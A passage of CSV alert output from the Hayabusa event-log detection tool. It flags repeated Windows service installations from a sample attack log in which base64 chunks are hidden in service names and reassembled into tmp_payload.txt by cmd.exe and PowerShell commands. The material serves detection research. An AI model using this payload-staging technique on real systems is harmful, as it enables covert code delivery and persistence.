tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
